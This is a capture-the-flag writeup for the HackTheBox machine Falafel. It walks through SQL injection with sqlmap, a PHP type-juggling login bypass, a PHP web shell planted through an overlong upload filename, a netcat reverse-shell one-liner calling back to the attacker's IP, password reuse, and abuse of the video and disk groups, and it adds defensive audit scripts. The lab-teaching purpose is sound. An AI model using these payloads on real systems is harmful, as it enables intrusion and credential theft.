Falafel-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: directory and file scanning, SQL injection, PHP loose-comparison (type juggling) vulnerability, overlong image filename, database password reuse, the privileged video group, the privileged disk group

Reference: https://0xdf.gitlab.io/2018/06/23/htb-falafel.html

Reference: https://behindsecurity.com/writeups-en/tricking-php-logic-on-falafel-ctf/

0x01 Obtaining user access

1. Box description:

Falafel is not very difficult, but it requires some unique tricks and techniques to exploit successfully. Many hints are provided, but proper enumeration is needed to find them.

2. Target IP address: 10.10.10.73

3. Open ports:

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=5000 -oG allports 10.10.10.73
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 10:24 CST
Warning: 10.10.10.73 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.73
Host is up (0.36s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 26.71 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p22,80 -sC -sV --min-rate=5000 10.10.10.73
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 10:26 CST
Nmap scan report for 10.10.10.73
Host is up (0.64s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
| 256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
|_ 256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/*.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Falafel Lovers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.84 seconds

4. Take a look at the web pages

http://10.10.10.73/

http://10.10.10.73/login.php

http://10.10.10.73/robots.txt
User-agent: *
Disallow: /*.txt

5. Directory and file enumeration turns up a note

┌──(kali㉿offsec)-[~/Desktop]
└─$ gobuster -u http://10.10.10.73 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html -t 30

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.73/
[+] Threads : 30
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
[+] Extensions : .txt,.php,.html
=====================================================
/images (Status: 301)
/login.php (Status: 200)
/profile.php (Status: 302)
/index.php (Status: 200)
/uploads (Status: 301)
/header.php (Status: 200)
/assets (Status: 301)
/footer.php (Status: 200)
/upload.php (Status: 302)
/css (Status: 301)
/style.php (Status: 200)
/js (Status: 301)
/logout.php (Status: 302)
/robots.txt (Status: 200)
/cyberlaw.txt (Status: 200)
/connection.php (Status: 200)
=====================================================

6. Contents of the note

http://10.10.10.73/cyberlaw.txt

From: Falafel Network Admin (admin@falafel.htb)
Subject: URGENT!! MALICIOUS SITE TAKE OVER!
Date: November 25, 2017 3:30:58 PM PDT
To: lawyers@falafel.htb, devs@falafel.htb
Delivery-Date: Tue, 25 Nov 2017 15:31:01 -0700
Mime-Version: 1.0
X-Spam-Status: score=3.7 tests=DNS_FROM_RFC_POST, HTML_00_10, HTML_MESSAGE, HTML_SHORT_LENGTH version=3.1.7
X-Spam-Level: ***
A user named "chris" has informed me that he could log into MY account without knowing the password,
then take FULL CONTROL of the website using the image upload feature.
We got a cyber protection on the login form, and a senior php developer worked on filtering the URL of the upload,
so I have no idea how he did it.
Dear lawyers, please handle him. I believe Cyberlaw is on our side.
Dear develpors, fix this broken site ASAP.
~admin

7. The note also reveals some email addresses and a user ID

admin@falafel.htb
lawyers@falafel.htb
devs@falafel.htb

chris

8. Enumeration shows that the login form is vulnerable to SQL injection

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat 1.txt
POST /login.php HTTP/1.1
Host: 10.10.10.73
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://10.10.10.73
Connection: close
Referer: http://10.10.10.73/login.php
Cookie: PHPSESSID=5qmk32cp5rgg7mhfcoia4m8mk5
Upgrade-Insecure-Requests: 1

username=chris&password=chris
┌──(kali㉿offsec)-[~/Desktop]
└─$ sqlmap -r login-chris.request --level 5 --risk 3 --batch --string "Wrong identification" --dump

.................
Table: users
[2 entries]
+----+--------+----------+---------------------------------------------+
| ID | role | username | password |
+----+--------+----------+---------------------------------------------+
| 1 | admin | admin | 0e462096931906507119562988736854 |
| 2 | normal | chris | d4ee02a22fc872e36d9e3751ba72ddc8 |
+----+--------+----------+---------------------------------------------+
.....................

9. The database holds the account password hashes; cracking one of them recovers the password

d4ee02a22fc872e36d9e3751ba72ddc8	md5	juggling

10. Logging in with these credentials reveals some hints

http://10.10.10.73/profile.php

11. This part is really more CTF-like

Vulnerability description: PHP type juggling is a weakness that arises from PHP's non-strict comparison and type-conversion behaviour. When variables of different types are compared, the loose comparison operators (== and !=) can produce unexpected results. For example, when a string is compared with an integer, PHP may silently convert the string to an integer before comparing. Behind Security noticed the "0e" prefix on the admin password hash.

In PHP, a "0e" prefix is a pattern that certain numeric-looking values fall into when compared with the loose operators (== and !=). The prefix is read as scientific notation, where "e" marks a power of 10. For example, the value "0e123" is interpreted as 0 * 10^123, which equals 0. Likewise "0e456" is interpreted as 0 * 10^456, which is also 0. Below is a vulnerable code sample that illustrates the flaw.


A short introduction to PHP type juggling
PHP type juggling is PHP's attempt to resolve an equality test by making assumptions about the types of the variables. For example, PHP converts a string to a number by taking any leading digits and ignoring the rest. It also treats a string that starts with a letter as 0, and a string that starts with digits followed by an e as an exponent:

php > if ("3afa2c1fb515c53a3349c7f8d619abc8" == 4) { echo "equal"; } else { echo "not equal"; } // 3 != 4
not equal
php > if ("3afa2c1fb515c53a3349c7f8d619abc8" == 3) { echo "equal"; } else { echo "not equal"; } // 3 == 3
equal
php > if ("aafa2c1fb515c53a3349c7f8d619abc8" == 0) { echo "equal"; } else { echo "not equal"; } // 0 == 0
equal

You can avoid this by using the === operator in PHP:


php > if ("aafa2c1fb515c53a3349c7f8d619abc8" === 0) { echo "equal"; } else { echo "not equal"; }
not equal


Juggling the admin password
With the type juggling hint in mind, I tried a few ways to get into the site.

This will work because we already have the admin password hash from sqlmap, and it starts with 0e: 0e462096931906507119562988736854

The Magic Hashes reference mentioned above lists, for many different hash types, a string whose hash begins with 0e. Trying these, the md5 one, 240610708, logs in:


Steps to reproduce: Behind Security searched for a crafted string whose md5 begins with "0e" and submitted it as the password for the user "admin". The submitted password was 240610708. Its md5 hash is "0e462097431906509019562988736854", which PHP interprets as 0. That matches the stored hash "0e462096931906507119562988736854", so authentication succeeds.
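To make the loose-comparison rule concrete from the defender's side, here is an added example (not code from the page, 0xdf or Behind Security) that models PHP 5/7's == on two strings in Python, flags "magic" hashes in a credential dump, and places the vulnerable login check beside a strict, constant-time one. The numeric-string rule and the shape of the login check are assumptions about the box's PHP; the stored hash and the password are the values quoted above.

```python
import hashlib
import hmac
import re

# PHP 5/7 treat a string as "numeric" when the whole string parses as an integer
# or float, exponent forms included; "0e462..." is 0 * 10^462... == 0.0.
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def md5_hex(password: str) -> str:
    """Hex MD5 of a password, the way the box's login code appears to hash it."""
    return hashlib.md5(password.encode()).hexdigest()


def php_loose_equal(a: str, b: str) -> bool:
    """Model of PHP's == on two strings (assumed PHP 5/7 rule): when both strings
    look numeric they are compared as numbers, otherwise byte for byte."""
    if _NUMERIC.match(a) and _NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def is_magic_hash(hexdigest: str) -> bool:
    """A 'magic hash' is '0e' followed only by digits: PHP's == reads it as 0.0,
    so any two such digests compare loosely equal."""
    return re.fullmatch(r"0e[0-9]+", hexdigest) is not None


# Stored admin hash from the sqlmap dump on this page.
STORED_ADMIN_HASH = "0e462096931906507119562988736854"


def vulnerable_login(password: str, stored_hash: str = STORED_ADMIN_HASH) -> bool:
    """Login check with loose comparison: md5($password) == $stored."""
    return php_loose_equal(md5_hex(password), stored_hash)


def hardened_login(password: str, stored_hash: str = STORED_ADMIN_HASH) -> bool:
    """Same check with a strict, constant-time comparison. In PHP this is
    hash_equals() (=== at a minimum); better still is password_verify() over a
    bcrypt/argon2 hash instead of unsalted MD5."""
    return hmac.compare_digest(md5_hex(password), stored_hash)


def audit_hashes(rows: dict) -> list:
    """Return the users whose stored hash is a loose-comparison magic value."""
    return sorted(user for user, h in rows.items() if is_magic_hash(h))


if __name__ == "__main__":
    dump = {"admin": STORED_ADMIN_HASH, "chris": "d4ee02a22fc872e36d9e3751ba72ddc8"}
    print("magic hashes in dump:", audit_hashes(dump))
    print("md5('240610708') =", md5_hex("240610708"))
    print("loose login accepts 240610708:", vulnerable_login("240610708"))
    print("strict login accepts 240610708:", hardened_login("240610708"))
```

audit_hashes is the check worth running over a real user table: any "0e"+digits MD5 or SHA1 in it is a latent bypass the moment the comparison is loose, and the fix (hash_equals or password_verify) removes the class of bug rather than the one hash.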

12. Exploitation attempt

┌──(kali㉿offsec)-[~/Desktop]
└─$ ls -la
总计 36
drwxr-xr-x 6 kali kali 4096 52900:24 .
drwx------ 28 kali kali 4096 52900:24 ..
-rw-r--r-- 1 kali kali 602 52810:47 1.txt
-rw-r--r-- 1 kali kali 33 52900:19 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.png
-rw-r--r-- 1 root root 334 52810:25 allports
drwxr-xr-x 2 kali kali 4096 52800:43 htb-vpn
drwxr-xr-x 3 kali kali 4096 52810:36 reports
drwxr-xr-x 4 kali kali 4096 32916:50 .svn
drwxr-xr-x 17 kali kali 4096 52706:51 tools

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.73 - - [29/May/2024 00:25:01] "GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.png HTTP/1.1" 200 -


┌──(kali㉿offsec)-[~/Desktop]
└─$ curl -vv http://10.10.10.73/uploads/0528-1121_d5f4d5f823b0c53b/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php?cmd=id
* Trying 10.10.10.73:80...
* Connected to 10.10.10.73 (10.10.10.73) port 80
> GET /uploads/0528-1121_d5f4d5f823b0c53b/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php?cmd=id HTTP/1.1
> Host: 10.10.10.73
> User-Agent: curl/8.5.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Tue, 28 May 2024 08:24:48 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Content-Length: 54
< Content-Type: text/html; charset=UTF-8
<
uid=33(www-data) gid=33(www-data) groups=33(www-data)
* Connection #0 to host 10.10.10.73 left intact
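The upload above goes through because the name is checked as submitted (it ends in .png) but is stored shortened, so what ends up on disk ends in .php. As an added example, not code from the page or the box, here is the check a defender would put in an upload handler: derive the extension from the name as it will actually be stored, refuse names that would be truncated, and preferably generate the on-disk name server-side. The 255-byte limit is an assumption (Linux NAME_MAX); the exact cut-off applied by the box's upload code is not stated on the page.

```python
import os
import secrets

# Assumed storage limit: Linux caps a path component at 255 bytes (NAME_MAX).
NAME_MAX = 255
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}

# Constructed sample of the shape used above: long enough that the trailing
# ".png" falls off once the name is cut to NAME_MAX bytes.
LONG_NAME = "A" * (NAME_MAX - 4) + ".php.png"


def stored_name(submitted: str, limit: int = NAME_MAX) -> str:
    """The name that lands on disk if the server blindly truncates to `limit` bytes."""
    return submitted.encode()[:limit].decode(errors="ignore")


def naive_check(submitted: str) -> bool:
    """The weak check: only the extension of the name as submitted."""
    return os.path.splitext(submitted)[1].lower() in ALLOWED_EXT


def hardened_check(submitted: str, limit: int = NAME_MAX) -> bool:
    """Reject names that could change meaning on the way to disk: path parts,
    more than one extension, or a length over the storage limit; then test the
    extension of the name exactly as it will be stored."""
    if not submitted or submitted != os.path.basename(submitted):
        return False
    if len(submitted.encode()) > limit:          # would be truncated
        return False
    final = stored_name(submitted, limit)        # same as submitted here; makes the rule explicit
    root, ext = os.path.splitext(final)
    if ext.lower() not in ALLOWED_EXT:
        return False
    return "." not in root                       # refuses x.php.png and similar double extensions


def safe_stored_name(submitted: str) -> str:
    """Stronger still: never store the client's name. Keep only a whitelisted
    extension and generate the stem server-side."""
    if not hardened_check(submitted):
        raise ValueError("rejected upload name")
    return secrets.token_hex(16) + os.path.splitext(submitted)[1].lower()


if __name__ == "__main__":
    print("naive check accepts:", naive_check(LONG_NAME))
    print("stored as:", stored_name(LONG_NAME)[-12:])
    print("hardened check accepts:", hardened_check(LONG_NAME))
    print("safe name for photo.png:", safe_stored_name("photo.png"))
```

Beyond the name check, the directory the files land in should not be executable by the web server at all (no PHP handler for /uploads), so that a naming slip never becomes code execution.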

13. Set up a reverse shell

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl -vv http://10.10.10.73/uploads/0528-1121_d5f4d5f823b0c53b/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.45%20443%20%3E%2Ftmp%2Ff
* Trying 10.10.10.73:80...
* Connected to 10.10.10.73 (10.10.10.73) port 80
> GET /uploads/0528-1121_d5f4d5f823b0c53b/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.45%20443%20%3E%2Ftmp%2Ff HTTP/1.1
> Host: 10.10.10.73
> User-Agent: curl/8.5.0
> Accept: */*
>

14. Initial shell obtained

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.73] 49606
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

15. Upgrade to a full TTY shell

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@falafel:/var/www/html/uploads/0528-1121_d5f4d5f823b0c53b$ script /dev/null -c bash
<528-1121_d5f4d5f823b0c53b$ script /dev/null -c bash
Script started, file is /dev/null
www-data@falafel:/var/www/html/uploads/0528-1121_d5f4d5f823b0c53b$ ^Z
zsh: suspended nc -lvnp 443

┌──(kali㉿offsec)-[~/Desktop]
└─$ stty raw -echo; fg
[1] + continued nc -lvnp 443
reset
reset: unknown terminal type unknown
Terminal type? screen

www-data@falafel:/var/www/html/uploads/0528-1121_d5f4d5f823b0c53b$


www-data@falafel:/var/www/html/uploads/0528-1121_d5f4d5f823b0c53b$ ls -la /home
total 16
drwxr-xr-x 4 root root 4096 Nov 27 2017 .
drwxr-xr-x 23 root root 4096 Nov 24 2023 ..
drwx------ 4 moshe moshe 4096 Nov 24 2023 moshe
drwx------ 4 yossi yossi 4096 Nov 24 2023 yossi
www-data@falafel:/var/www/html/uploads/0528-1121_d5f4d5f823b0c53b$

16. Enumeration finds the database connection details

www-data@falafel:/var/www/html/uploads/0528-1121_d5f4d5f823b0c53b$ cd ../../
www-data@falafel:/var/www/html$ ls -la
total 92
drwxr-x--- 7 root www-data 4096 Sep 13 2022 .
drwxr-xr-x 3 root root 4096 Sep 13 2022 ..
-rwxr-xr-- 1 root www-data 41 Oct 29 2017 .htaccess
drwxr-xr-- 2 root www-data 4096 Oct 29 2017 assets
-rwxr-xr-- 1 root www-data 423 Oct 29 2017 authorized.php
-rwxr-xr-- 1 root www-data 377 Nov 28 2017 connection.php
drwxr-xr-- 2 root www-data 4096 Nov 28 2017 css
-rwxr-xr-- 1 root www-data 804 Nov 27 2017 cyberlaw.txt
-rwxr-xr-- 1 root www-data 0 Nov 27 2017 footer.php
-rwxr-xr-- 1 root www-data 1140 Nov 27 2017 header.php
-rwxr-xr-- 1 root www-data 7335 Aug 13 2015 icon.png
drwxr-xr-- 2 root www-data 4096 Nov 27 2017 images
-rwxr-xr-- 1 root www-data 818 Nov 28 2017 index.php
drwxr-xr-- 2 root www-data 4096 Nov 28 2017 js
-rwxr-xr-- 1 root www-data 752 Oct 29 2017 login.php
-rwxr-xr-- 1 root www-data 1800 Nov 28 2017 login_logic.php
-rwxr-xr-- 1 root www-data 107 Oct 29 2017 logout.php
-rwxr-xr-- 1 root www-data 1913 Nov 28 2017 profile.php
-rwxr-xr-- 1 root www-data 30 Nov 28 2017 robots.txt
-rwxr-xr-- 1 root www-data 6174 Nov 28 2017 style.php
-rwxr-xr-- 1 root www-data 3647 Nov 28 2017 upload.php
drwxrwxr-- 3 root www-data 4096 May 28 11:21 uploads
www-data@falafel:/var/www/html$ cat connection.php
<?php
define('DB_SERVER', 'localhost:3306');
define('DB_USERNAME', 'moshe');
define('DB_PASSWORD', 'falafelIsReallyTasty');
define('DB_DATABASE', 'falafel');
$db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
// Check connection
if (mysqli_connect_errno())
{
echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
?>
www-data@falafel:/var/www/html$

17. That password happens to be reused; it logs in to the server over SSH

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh moshe@10.10.10.73
The authenticity of host '10.10.10.73 (10.10.10.73)' can't be established.
ED25519 key fingerprint is SHA256:HkqcmyRF5DsZuFTcQxQ4QcKq7eG+mQMn8MX9G5RkN5s.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.73' (ED25519) to the list of known hosts.
moshe@10.10.10.73's password:
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-213-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

Expanded Security Maintenance for Infrastructure is not enabled.

159 updates can be applied immediately.
51 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Nov 24 10:02:35 2023 from 10.10.14.19
$ id
uid=1001(moshe) gid=1001(moshe) groups=1001(moshe),4(adm),8(mail),9(news),22(voice),25(floppy),29(audio),44(video),60(games)
$

18. This gives the first flag

$ pwd
/home/moshe
$ ls -la
total 32
drwx------ 4 moshe moshe 4096 Nov 24 2023 .
drwxr-xr-x 4 root root 4096 Nov 27 2017 ..
lrwxrwxrwx 1 root root 9 Sep 13 2022 .bash_history -> /dev/null
-rw-r--r-- 1 moshe moshe 220 Sep 1 2015 .bash_logout
-rw-r--r-- 1 moshe moshe 3803 Nov 27 2017 .bashrc
drwx------ 2 moshe moshe 4096 Nov 27 2017 .cache
drwx------ 3 moshe moshe 4096 Nov 24 2023 .gnupg
-rw-r--r-- 1 moshe moshe 655 May 16 2017 .profile
-r-------- 1 moshe moshe 33 May 28 05:17 user.txt
$ cat user.txt
9ee4e09cde5fa96b789f422415095c77
$

0x02 Obtaining root access

19. Enumeration shows the user is in an unusual privileged group

$ id
uid=1001(moshe) gid=1001(moshe) groups=1001(moshe),4(adm),8(mail),9(news),22(voice),25(floppy),29(audio),44(video),60(games)
$ find / -type f -group video 2>/dev/null | grep -v /sys | grep -v /proc
$ find / -type d -group video 2>/dev/null | grep -v /sys | grep -v /proc
$ find / -type f \( -name "*.sh" -o -name "*.py" -o -name "*.pl" -o -name "*.rb" -o -name "*.php" \) -group video 2>/dev/null | grep -v /sys | grep -v /proc
$
Horizontal privilege escalation – yossi
Vulnerability description: the user "moshe" was found to be a member of the "video" group, which grants the ability to observe what logged-in users see on screen. Further investigation confirmed that the user "yossi" is logged into the system with a live tty shell. This creates a potential security hole, because membership in the "video" group can be abused to gain unauthorized access to sensitive data and perform unauthorized actions.

Remediation: to mitigate this horizontal privilege escalation, system administrators should carefully review and restrict users' group memberships. Grant only the privileges that are needed and avoid giving users excessive permissions, especially for groups such as "video" that can expose sensitive information. Regularly reviewing and auditing group membership, so that users hold only the minimum privileges their tasks require, is also essential.

Run id to verify that the user "moshe" is indeed a member of the "video" group.
Check whether the user "yossi" is logged into the target with a live tty shell. Running ps aux should show the active user sessions; if "yossi" has a tty shell, there is an active login session.
Because "moshe" can observe what logged-in users see, this privilege can be leveraged to reach yossi's session. See this resource for how the issue is exploited.

20. The /dev/fb0 device is interesting. fb0 is the framebuffer, an abstraction over the video hardware. We can cat it into a file:

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#video-group

$ pwd
/home/moshe
$ cat /dev/fb0 > screenshot.raw
$ ls -l screenshot.raw
-rw-rw-r-- 1 moshe moshe 4163040 May 28 11:41 screenshot.raw
$

21. To view this file we also need the screen resolution, which can be found under /sys/class/graphics/fb0/:

$ ls -l /sys/class/graphics/fb0/
total 0
-rw-r--r-- 1 root root 4096 May 28 11:35 bits_per_pixel
-rw-r--r-- 1 root root 4096 May 28 11:35 blank
-rw-r--r-- 1 root root 4096 May 28 11:35 bl_curve
-rw-r--r-- 1 root root 4096 May 28 11:35 console
-rw-r--r-- 1 root root 4096 May 28 11:35 cursor
-r--r--r-- 1 root root 4096 May 28 11:35 dev
lrwxrwxrwx 1 root root 0 May 28 11:42 device -> ../../../0000:00:0f.0
-rw-r--r-- 1 root root 4096 May 28 11:35 mode
-rw-r--r-- 1 root root 4096 May 28 11:35 modes
-r--r--r-- 1 root root 4096 May 28 11:35 name
-rw-r--r-- 1 root root 4096 May 28 11:35 pan
drwxr-xr-x 2 root root 0 May 28 11:35 power
-rw-r--r-- 1 root root 4096 May 28 11:35 rotate
-rw-r--r-- 1 root root 4096 May 28 11:35 state
-r--r--r-- 1 root root 4096 May 28 11:35 stride
lrwxrwxrwx 1 root root 0 May 28 11:42 subsystem -> ../../../../../class/graphics
-rw-r--r-- 1 root root 4096 May 28 05:13 uevent
-rw-r--r-- 1 root root 4096 May 28 11:35 virtual_size
$ cat /sys/class/graphics/fb0/virtual_size
1176,885
$

22. Copy it back to Kali:

falafelIsReallyTasty

echo 'falafelIsReallyTasty' | xclip; scp moshe@10.10.10.73:/home/moshe/screenshot.raw .

23. The image is large and the transfer was too slow for me, so I skipped it

24. Try logging in with the password found above

yossi

MoshePlzStopHackingMe!
┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh yossi@10.10.10.73
yossi@10.10.10.73's password:
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-213-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

Expanded Security Maintenance for Infrastructure is not enabled.

159 updates can be applied immediately.
51 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue May 28 05:13:40 2024
yossi@falafel:~$ id
uid=1000(yossi) gid=1000(yossi) groups=1000(yossi),4(adm),6(disk),24(cdrom),30(dip),46(plugdev),117(lpadmin),118(sambashare)
yossi@falafel:~$
Vulnerability description: the user "yossi" was found to be a member of the "disk" group, which grants significant privileges. According to HackTricks, membership in the "disk" group is almost equivalent to root access, because it lets the user read all data on the machine. This is a serious security risk, because "yossi" could abuse the elevated privileges tied to the "disk" group to access sensitive data.

Use the debugfs command to open the filesystem directly on the /dev/sda1 device. This lets "yossi" interact with the filesystem and potentially reach sensitive files and directories.
Traverse into critical directories such as /root.
Exploiting this allows reading sensitive files such as root.txt.
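Both escalations on this box (video for moshe, disk for yossi) come down to group membership nobody reviewed, which is exactly the remediation the video section above asks for. As an added example, not code from the page or any of the referenced writeups, here is a small audit that parses /etc/group and /etc/passwd and reports every user who holds a high-risk group, whether as a supplementary group or as their primary gid. The sample files are constructed to mirror the id output shown on this page; the list of groups and the reasons attached to them are my assumptions about what deserves a justification on a typical Ubuntu host.

```python
# Constructed sample files modelled on the id output shown on this page;
# they are not the real /etc/group and /etc/passwd from the box.
SAMPLE_GROUP = """\
root:x:0:
adm:x:4:moshe,yossi
disk:x:6:yossi
www-data:x:33:
video:x:44:moshe
"""
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
yossi:x:1000:1000::/home/yossi:/bin/bash
moshe:x:1001:1001::/home/moshe:/bin/sh
"""

# Groups whose membership should carry an explicit justification, with the reason.
HIGH_RISK_GROUPS = {
    "disk": "raw access to block devices; debugfs /dev/sda1 reads any file, so near-root",
    "video": "read access to /dev/fb0; can capture what other logged-in users see",
    "adm": "read access to most of /var/log",
    "shadow": "read access to /etc/shadow",
    "docker": "control of the Docker socket; root-equivalent",
    "sudo": "sudo rights",
}


def parse_group(text):
    """Map group name -> (gid, set of supplementary members)."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups


def parse_passwd(text):
    """Map user name -> primary gid (membership that /etc/group does not list)."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        users[fields[0]] = int(fields[3])
    return users


def audit(group_text, passwd_text, risky=HIGH_RISK_GROUPS):
    """Return {user: sorted list of risky groups}, counting supplementary
    membership and primary gid, the same two sources `id` reports."""
    groups = parse_group(group_text)
    gid_to_name = {gid: name for name, (gid, _) in groups.items()}
    findings = {}
    for user, primary_gid in parse_passwd(passwd_text).items():
        hits = set()
        primary = gid_to_name.get(primary_gid)
        if primary in risky:
            hits.add(primary)
        for name, (_, members) in groups.items():
            if name in risky and user in members:
                hits.add(name)
        if hits:
            findings[user] = sorted(hits)
    return findings


def audit_files(group_path="/etc/group", passwd_path="/etc/passwd"):
    """Run the same audit against a live system."""
    with open(group_path) as g, open(passwd_path) as p:
        return audit(g.read(), p.read())


if __name__ == "__main__":
    for user, hits in audit(SAMPLE_GROUP, SAMPLE_PASSWD).items():
        for grp in hits:
            print(f"{user}: {grp} - {HIGH_RISK_GROUPS[grp]}")
```

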